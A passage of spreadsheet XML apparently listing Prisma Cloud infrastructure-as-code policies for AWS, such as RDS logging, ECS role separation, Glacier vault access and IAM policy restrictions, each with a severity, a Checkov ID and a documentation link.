          <t>Respective logs of Amazon RDS are disabled</t>
        </is>
      </c>
      <c r="L1037" t="inlineStr"/>
      <c r="M1037" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1037" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1037" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1037" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1037" t="inlineStr"/>
      <c r="R1037" t="inlineStr"/>
      <c r="S1037" t="inlineStr"/>
      <c r="T1037" t="b">
        <v>0</v>
      </c>
      <c r="U1037" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1037" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-db-instance</t>
        </is>
      </c>
      <c r="W1037" t="inlineStr">
        <is>
          <t>Ensure that that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled</t>
        </is>
      </c>
      <c r="X1037" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-that-respective-logs-of-amazon-relational-database-service-amazon-rds-are-enabled</t>
        </is>
      </c>
      <c r="Y1037" t="inlineStr"/>
      <c r="Z1037" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA1037" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1037" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1037" t="inlineStr">
        <is>
          <t>CKV_AWS_129</t>
        </is>
      </c>
      <c r="AD1037" t="b">
        <v>1</v>
      </c>
      <c r="AE1037" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1037" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>c184fbcc-8508-4965-8473-c8d6e99d428b</t>
        </is>
      </c>
      <c r="AI1037" t="inlineStr"/>
      <c r="AJ1037" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1037" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" t="inlineStr"/>
      <c r="B1038" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1038" s="2" t="inlineStr"/>
      <c r="D1038" t="inlineStr"/>
      <c r="E1038" t="inlineStr"/>
      <c r="F1038" t="inlineStr"/>
      <c r="G1038" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1038" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-ecs</t>
        </is>
      </c>
      <c r="K1038" t="inlineStr">
        <is>
          <t>AWS Execution Role ARN and Task Role ARN are different in ECS Task definitions</t>
        </is>
      </c>
      <c r="L1038" t="inlineStr"/>
      <c r="M1038" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1038" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1038" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1038" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1038" t="inlineStr"/>
      <c r="R1038" t="inlineStr"/>
      <c r="S1038" t="inlineStr"/>
      <c r="T1038" t="b">
        <v>0</v>
      </c>
      <c r="U1038" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1038" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-ecs-task-definition</t>
        </is>
      </c>
      <c r="W1038" t="inlineStr">
        <is>
          <t>Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions</t>
        </is>
      </c>
      <c r="X1038" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-the-aws-execution-role-arn-and-task-role-arn-are-different-in-ecs-task-definitions</t>
        </is>
      </c>
      <c r="Y1038" t="inlineStr"/>
      <c r="Z1038" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_ecs_task_definition"]}</t>
        </is>
      </c>
      <c r="AA1038" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1038" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1038" t="inlineStr">
        <is>
          <t>CKV_AWS_249</t>
        </is>
      </c>
      <c r="AD1038" t="b">
        <v>1</v>
      </c>
      <c r="AE1038" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1038" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>12cbf59c-d495-4192-94f0-d28f4ce4a4d4</t>
        </is>
      </c>
      <c r="AI1038" t="inlineStr"/>
      <c r="AJ1038" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1038" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" t="inlineStr"/>
      <c r="B1039" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1039" s="2" t="inlineStr"/>
      <c r="D1039" t="inlineStr"/>
      <c r="E1039" t="inlineStr"/>
      <c r="F1039" t="inlineStr"/>
      <c r="G1039" t="b">
        <v>1</v>
      </c>
      <c r="H10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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1039" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-glacier</t>
        </is>
      </c>
      <c r="K1039" t="inlineStr">
        <is>
          <t>Glacier Vault access policy is public and not restricted to specific services or principals</t>
        </is>
      </c>
      <c r="L1039" t="inlineStr"/>
      <c r="M1039" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1039" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1039" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1039" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1039" t="inlineStr"/>
      <c r="R1039" t="inlineStr"/>
      <c r="S1039" t="inlineStr"/>
      <c r="T1039" t="b">
        <v>0</v>
      </c>
      <c r="U1039" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1039" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-glacier-vault</t>
        </is>
      </c>
      <c r="W1039" t="inlineStr">
        <is>
          <t>Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it</t>
        </is>
      </c>
      <c r="X1039" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-glacier-vault-access-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it</t>
        </is>
      </c>
      <c r="Y1039" t="inlineStr"/>
      <c r="Z1039" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_glacier_vault"]}</t>
        </is>
      </c>
      <c r="AA1039" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1039" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1039" t="inlineStr">
        <is>
          <t>CKV_AWS_167</t>
        </is>
      </c>
      <c r="AD1039" t="b">
        <v>1</v>
      </c>
      <c r="AE1039" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1039" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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39" t="inlineStr">
        <is>
          <t>b44a2d9e-8300-4ed8-a7a4-3ca382a9c798</t>
        </is>
      </c>
      <c r="AI1039" t="inlineStr"/>
      <c r="AJ1039" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1039" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" t="inlineStr"/>
      <c r="B1040" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1040" s="2" t="inlineStr"/>
      <c r="D1040" t="inlineStr"/>
      <c r="E1040" t="inlineStr"/>
      <c r="F1040" t="inlineStr"/>
      <c r="G1040" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1040" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1040" t="inlineStr">
        <is>
          <t>AWS IAM password policy does allow password reuse</t>
        </is>
      </c>
      <c r="L1040" t="inlineStr"/>
      <c r="M1040" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1040" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1040" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1040" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1040" t="inlineStr"/>
      <c r="R1040" t="inlineStr"/>
      <c r="S1040" t="inlineStr"/>
      <c r="T1040" t="b">
        <v>0</v>
      </c>
      <c r="U1040" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1040" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-account-password-policy</t>
        </is>
      </c>
      <c r="W1040" t="inlineStr">
        <is>
          <t>Password policies are used to enforce the creation and use of password complexity. Your IAM password policy must prevent reuse of passwords. Each password should be brand new to increase security, especially from a brute force attack.</t>
        </is>
      </c>
      <c r="X1040" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-10</t>
        </is>
      </c>
      <c r="Y1040" t="inlineStr"/>
      <c r="Z1040" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_account_password_policy"]}</t>
        </is>
      </c>
      <c r="AA1040" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1040" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1040" t="inlineStr">
        <is>
          <t>CKV_AWS_13</t>
        </is>
      </c>
      <c r="AD1040" t="b">
        <v>1</v>
      </c>
      <c r="AE1040" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1040" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>950da4cc-b70e-40be-aa7a-68a8c4ca47b7</t>
        </is>
      </c>
      <c r="AI1040" t="inlineStr"/>
      <c r="AJ1040" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1040" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" t="inlineStr"/>
      <c r="B1041" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1041" s="2" t="inlineStr"/>
      <c r="D1041" t="inlineStr"/>
      <c r="E1041" t="inlineStr"/>
      <c r="F1041" t="inlineStr"/>
      <c r="G1041" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1041" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1041" t="inlineStr">
        <is>
          <t>IAM policies allow write access without constraints</t>
        </is>
      </c>
      <c r="L1041" t="inlineStr"/>
      <c r="M1041" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1041" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1041" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1041" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1041" t="inlineStr"/>
      <c r="R1041" t="inlineStr"/>
      <c r="S1041" t="inlineStr"/>
      <c r="T1041" t="b">
        <v>0</v>
      </c>
      <c r="U1041" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1041" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy</t>
        </is>
      </c>
      <c r="W1041" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow write access without constraints</t>
        </is>
      </c>
      <c r="X1041" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-290</t>
        </is>
      </c>
      <c r="Y1041" t="inlineStr"/>
      <c r="Z1041" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1041" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1041" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1041" t="inlineStr">
        <is>
          <t>CKV_AWS_290</t>
        </is>
      </c>
      <c r="AD1041" t="b">
        <v>1</v>
      </c>
      <c r="AE1041" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1041" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>0462cd2d-9645-4a40-b00a-1a243b1b0714</t>
        </is>
      </c>
      <c r="AI1041" t="inlineStr"/>
      <c r="AJ1041" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1041" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" t="inlineStr"/>
      <c r="B1042" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1042" s="2" t="inlineStr"/>
      <c r="D1042" t="inlineStr"/>
      <c r="E1042" t="inlineStr"/>
      <c r="F1042" t="inlineStr"/>
      <c r="G1042" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1042" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1042" t="inlineStr">
        <is>
          <t>IAM policies allow exposure of credentials</t>
        </is>
      </c>
      <c r="L1042" t="inlineStr"/>
      <c r="M1042" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1042" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1042" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1042" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1042" t="inlineStr"/>
      <c r="R1042" t="inlineStr"/>
      <c r="S1042" t="inlineStr"/>
      <c r="T1042" t="b">
        <v>0</v>
      </c>
      <c r="U1042" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1042" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy</t>
        </is>
      </c>
      <c r="W1042" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow credentials exposure</t>
        </is>
      </c>
      <c r="X1042" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-287</t>
        </is>
      </c>
      <c r="Y1042" t="inlineStr"/>
      <c r="Z1042" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1042" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1042" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1042" t="inlineStr">
        <is>
          <t>CKV_AWS_287</t>
        </is>
      </c>
      <c r="AD1042" t="b">
        <v>1</v>
      </c>
      <c r="AE1042" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1042" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>867b0aa4-ef27-41c7-b9c6-678e9cd177c2</t>
        </is>
      </c>
      <c r="AI1042" t="inlineStr"/>
      <c r="AJ1042" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1042" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" t="inlineStr"/>
      <c r="B1043" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1043" s="2" t="inlineStr"/>
      <c r="D1043" t="inlineStr"/>
      <c r="E1043" t="inlineStr"/>
      <c r="F1043" t="inlineStr"/>
      <c r="G1043" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1043" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1043" t="inlineStr">
        <is>
          <t>IAM policy uses the AWS AdministratorAccess policy</t>
        </is>
      </c>
      <c r="L1043" t="inlineStr"/>
      <c r="M1043" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1043" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1043" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1043" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1043" t="inlineStr"/>
      <c r="R1043" t="inlineStr"/>
      <c r="S1043" t="inlineStr"/>
      <c r="T1043" t="b">
        <v>0</v>
      </c>
      <c r="U1043" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1043" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy</t>
        </is>
      </c>
      <c r="W1043" t="inlineStr">
        <is>
          <t>Disallow policies from using the AWS AdministratorAccess policy</t>
        </is>
      </c>
      <c r="X1043" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-275</t>
        </is>
      </c>
      <c r="Y1043" t="inlineStr"/>
      <c r="Z1043" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1043" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1043" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1043" t="inlineStr">
        <is>
          <t>CKV_AWS_275</t>
        </is>
      </c>
      <c r="AD1043" t="b">
        <v>1</v>
      </c>
      <c r="AE1043" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1043" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>8c9d1fe8-a2ff-403c-9887-f344a13b92ca</t>
        </is>
      </c>
      <c r="AI1043" t="inlineStr"/>
      <c r="AJ1043" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1043" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" t="inlineStr"/>
      <c r="B1044" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1044" s="2" t="inlineStr"/>
      <c r="D1044" t="inlineStr"/>
      <c r="E1044" t="inlineStr"/>
      <c r="F1044" t="inlineStr"/>
      <c r="G1044" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1044" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1044" t="inlineStr">
        <is>
          <t>IAM policies allow permissions management or resource exposure without constraints</t>
        </is>
      </c>
      <c r="L1044" t="inlineStr"/>
      <c r="M1044" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1044" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1044" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1044" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1044" t="inlineStr"/>
      <c r="R1044" t="inlineStr"/>
      <c r="S1044" t="inlineStr"/>
      <c r="T1044" t="b">
        <v>0</v>
      </c>
      <c r="U1044" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1044" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy</t>
        </is>
      </c>
      <c r="W1044" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow permissions management / resource exposure without constraints</t>
        </is>
      </c>
      <c r="X1044" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-289</t>
        </is>
      </c>
      <c r="Y1044" t="inlineStr"/>
      <c r="Z1044" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1044" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1044" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1044" t="inlineStr">
        <is>
          <t>CKV_AWS_289</t>
        </is>
      </c>
      <c r="AD1044" t="b">
        <v>1</v>
      </c>
      <c r="AE1044" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1044" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>208d02c2-a308-4c46-ba76-c206241fbcbd</t>
        </is>
      </c>
      <c r="AI1044" t="inlineStr"/>
      <c r="AJ1044" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1044" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" t="inlineStr"/>
      <c r="B1045" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1045" s="2" t="inlineStr"/>
      <c r="D1045" t="inlineStr"/>
      <c r="E1045" t="inlineStr"/>
      <c r="F1045" t="inlineStr"/>
      <c r="G1045" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1045" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1045" t="inlineStr">
        <is>
          <t>IAM policies allow data exfiltration</t>
        </is>
      </c>
      <c r="L1045" t="inlineStr"/>
      <c r="M1045" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1045" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1045" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1045" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1045" t="inlineStr"/>
      <c r="R1045" t="inlineStr"/>
      <c r="S1045" t="inlineStr"/>
      <c r="T1045" t="b">
        <v>0</v>
      </c>
      <c r="U1045" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1045" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy</t>
        </is>
      </c>
      <c r="W1045" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow data exfiltration</t>
        </is>
      </c>
      <c r="X1045" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-288</t>
        </is>
      </c>
      <c r="Y1045" t="inlineStr"/>
      <c r="Z1045" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1045" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1045" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1045" t="inlineStr">
        <is>
          <t>CKV_AWS_288</t>
        </is>
      </c>
      <c r="AD1045" t="b">
        <v>1</v>
      </c>
      <c r="AE1045" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1045" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>598373bb-20ac-418e-879d-06addb6e567b</t>
        </is>
      </c>
      <c r="AI1045" t="inlineStr"/>
      <c r="AJ1045" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1045" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" t="inlineStr"/>
      <c r="B1046" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1046" s="2" t="inlineStr"/>
      <c r="D1046" t="inlineStr"/>
      <c r="E1046" t="inlineStr"/>
      <c r="F1046" t="inlineStr"/>
      <c r="G1046" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1046" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1046" t="inlineStr">
        <is>
          <t>The AWS Managed IAMFullAccess IAM policy should not be used</t>
        </is>
      </c>
      <c r="L1046" t="inlineStr"/>
      <c r="M1046" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1046" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1046" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1046" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1046" t="inlineStr"/>
      <c r="R1046" t="inlineStr"/>
      <c r="S1046" t="inlineStr"/>
      <c r="T1046" t="b">
        <v>0</v>
      </c>
      <c r="U1046" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1046" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy,aws-iam-policy-attachment,aws-iam-user-policy-attachment,aws-iam-role-policy-attachment,aws-iam-group-policy-attachment,aws-iam-role,aws-ssoadmin-managed-policy-attachment</t>
        </is>
      </c>
      <c r="W1046" t="inlineStr">
        <is>
          <t>Ensure AWS Managed IAMFullAccess IAM policy is not used.</t>
        </is>
      </c>
      <c r="X1046" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-2-56</t>
        </is>
      </c>
      <c r="Y1046" t="inlineStr"/>
      <c r="Z1046" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy","aws_iam_policy_attachment","aws_iam_user_policy_attachment","aws_iam_role_policy_attachment","aws_iam_group_policy_attachment","aws_iam_role","aws_ssoadmin_managed_policy_attachment"]}</t>
        </is>
      </c>
      <c r="AA1046" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1046" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1046" t="inlineStr">
        <is>
          <t>CKV2_AWS_56</t>
        </is>
      </c>
      <c r="AD1046" t="b">
        <v>1</v>
      </c>
      <c r="AE1046" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1046" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>be77aed1-710b-4659-824f-ae52ef592669</t>
        </is>
      </c>
      <c r="AI1046" t="inlineStr"/>
      <c r="AJ1046" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1046" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" t="inlineStr"/>
      <c r="B1047" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1047" s="2" t="inlineStr"/>
      <c r="D1047" t="inlineStr"/>
      <c r="E1047" t="inlineStr"/>
      <c r="F1047" t="inlineStr"/>
      <c r="G1047" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1047" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
